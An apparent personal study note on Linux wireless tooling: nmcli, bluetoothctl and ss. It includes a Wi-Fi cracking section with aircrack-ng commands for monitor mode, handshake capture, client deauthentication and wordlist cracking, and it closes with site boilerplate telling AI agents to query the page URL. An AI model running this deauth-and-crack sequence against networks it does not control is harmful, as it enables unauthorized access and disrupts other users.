# Wireless networks ## nmcil #### This is how it transitioned: `iwconfig` → `iw/nmcli` `nmcli dev` will list the devices the system know about ```bash $ sudo nmcli dev DEVICE    TYPE      STATE                   CONNECTION   wlp2s0    wifi      connected               MylilNetwork      lo        loopback  connected (externally)  lo           enp1s0f0  ethernet  unavailable             -- ``` `sudo nmcli device show wlp2s0` The command shows what network you are connected to, the frequency, signal strength, and bitrate ```bash vix@thinkpad:~$ sudo nmcli device show wlp2s0 GENERAL.DEVICE: wlp2s0 GENERAL.TYPE: wifi GENERAL.HWADDR: AA:BB:CC:DD:EE:FF GENERAL.MTU: 1500 GENERAL.STATE: 100 (connected) GENERAL.CONNECTION: MylilNetwork ~~ ``` `nmcli connection show` `nmcli connection show "”` these command will show you detailed view of **connection profile** ### Scan for wifi networks `sudo nmcli dev wifi` this command will simply scan wifi APs around you with a better view ```bash $ sudo nmcli dev wifi IN-US     SSID          MODE   CHAN  RATE        SIGNAL  BARS  SECURITY             MylilNetwork  Infra  1     195 Mbit/s  77      ▂▄▆_  WPA2        *        G59       Infra  149   540 Mbit/s  62      ▂▄▆_  WPA2                 --            Infra  7     270 Mbit/s  50      ▂▄__  WPA2                 MrYu Home     Infra  157   540 Mbit/s  45      ▂▄__  WPA2                 --            Infra  157   540 Mbit/s  45      ▂▄__  WPA2                 ikea_Guest    Infra  10    270 Mbit/s  44      ▂▄__  WPA2                 Pinky         Infra  8     270 Mbit/s  40      ▂▄__  WPA2                --            Infra  40    270 Mbit/s  32      ▂▄__  WPA2                 --            Infra  36    540 Mbit/s  30      ▂___  WPA2 WPA3            Joe_5G       Infra  36    540 Mbit/s  30      ▂___  WPA2 WPA3   ``` ### Connect `sudo nmcli dev wifi connect password ` this is how you can connect to an AP ### Disconnect `sudo nmcli device disconnect wlp3s0` simple as that ### Device capabilities `iw phy` will show you what your Wi-Fi card can do, and it’s very detailed, and only works on `iw` ## Bluetooth When connecting to bluetooth devices we often see **pairing** and it’s just basically connecting. When a bluetooth device in a discoverable mode it will transmit the listed down below: * Name * Class * List of services * Technical information When two devices pair, they will exchange a secret or link key. For every bluetooth devices has a unique 48-bit identifier which is usually a manufacturer-assigned name ### Connecting devices On **debian** it’s using `bluetoothctl` ```bash $ bluetoothctl #this will generate a new shell session for bluetooth [bluetooth]$ ``` To scan devices we can simply type `scan on` ```bash [bluetooth]$ scan on ``` After that you will see devices appear with their MAC address you will see things like: `[NEW] Device AA:BB:CC:11:22:33 Headphones` And to pair it we just need to type `pair ` ```bash [bluetooth]$ pair AA:BB:CC:11:22:33 ``` If you want to reconnect automatically, we just need to type `trust ` ```bash [bluetooth]$ trust AA:BB:CC:11:22:33 ``` Then here’s the last part, connect, we can do `connect ` ```bash [bluetooth]$ connect AA:BB:CC:11:22:33 ``` ### Disconnecting and removing devices To disconnect is pretty intuitive `disconnect ` ```bash [bluetooth]$ disconnect AA:BB:CC:11:22:33 ``` But sometimes you don’t want to save the device’s info, about that we will use `remove ` This command will completely delete all the info about the device so you won’t connect it automatically ```bash [bluetooth]$ remove AA:BB:CC:11:22:33 ``` ### Finding/Checking devices To find the device MAC address we will use `device` command. We are still working with `bluetoothctl` So first, let’s list out the devices using `device` and then use `info ` to see the detailed layout of the device you chooses ```bash [bluetooth]$ devices Device AA:BB:CC:11:22:33 Headphones Device 11:22:33:DD:EE:FF Anker SoundCore [bluetooth]$ info AA:BB:CC:11:22:33 Device AA:BB:CC:11:22:33 (public) Name: My Bluetooth Headphones Alias: My Bluetooth Headphones Paired: yes Trusted: yes Blocked: no Connected: yes LegacyPairing: no UUID: Audio Sink (0000110b-0000-1000-8000-00805f9b34fb) UUID: A/V Remote Control Target (0000110c-0000-1000-8000-00805f9b34fb) UUID: Advanced Audio Distribu.. (0000110d-0000-1000-8000-00805f9b34fb) ``` ## Wi-Fi cracking ### **aircrack-ng** To crack Wi-Fi APs we will work with this tool, but first, we need to get our network card into **monitor mode.** We will use `airmon-ng start ` ```bash $ airmon-ng start wlp2s0 ~~some info~~ ``` Now we’ve started the monitor mode and notice that your wireless interface will be renamed to something like **wlp2s0mon `mon`** Now we are going to make it up and run. Here, we will use `airodump-ng wlp2s0mon` ```bash airodump-ng wlp2s0mon ``` The network card will pick up some info like listed: * **BSSID** MAC address of the AP or client * **PWR** Strength of the signal * **ENC** Encryption used to secure the transmission * **#Data** Data throughput rate * **CH** Channel the AP is operating on * **ESSID** Name of the AP You will see something like this after running the command The top session is listing the Wi-Fi routers it can see, and the bottom one which refers to **Clients** will list devices (laptops, phones) it can see ```bash CH 9 ][ Elapsed: 45 s ][ 2025-6-27 10:30 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID ------------------------------------------------------------------------------------------------- 1C:B0:4C:8F:A1:B2 -45 122 15 0 6 130 WPA2 CCMP PSK MyHomeWiFi 00:1A:2B:3C:4D:5E -68 98 0 0 11 54 WPA2 TKIP PSK CoffeeShop_Free DE:AD:BE:EF:12:34 -81 43 2 0 1 54. WEP WEP SECRET_NETWORK BSSID STATION PWR Rate Lost Frames Probe ------------------------------------------------------------------------------------------------- 1C:B0:4C:8F:A1:B2 A1:B2:C3:D4:E5:F6 -52 54-24 0 88 (not associated) AA:BB:CC:DD:EE:FF -60 0- 1 0 4 MyHomeWiFi ``` ### Wi-Fi password cracking To crack wifi password we need three main sessions In the first session we will insert command with the client and AP MAC addresses and the channel: This command will capture all the packets traversing the AP on channel 10 using the `-c` flag ```bash airodump-ng -c 10 --bssid AA:BB:CC:DD:EE:FF -w MyHomeWiFi wlp2s0mon ``` On to the second session. Here we will use `aireplay-ng` command to deauthenticate anyone connected to the AP and force them to reauthenticate to the AP When they reauth you will capture their password hashes ```bash aireplay-ng --deauth 100 -a AA:BB:CC:DD:EE:FF:22-c A0:A3:E2:44:7C:E5 wlp2s0mon ``` In the last session we will start cracking :) ```bash aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF MyHomeWiFi.cap ``` ## ss ### Checking open ports locally This is so useful when you have some labs hosted locally and forgot the port ```bash ss -tuln ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://vix-w1zzer.gitbook.io/vixwizzer/notes/linux/wireless-networks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.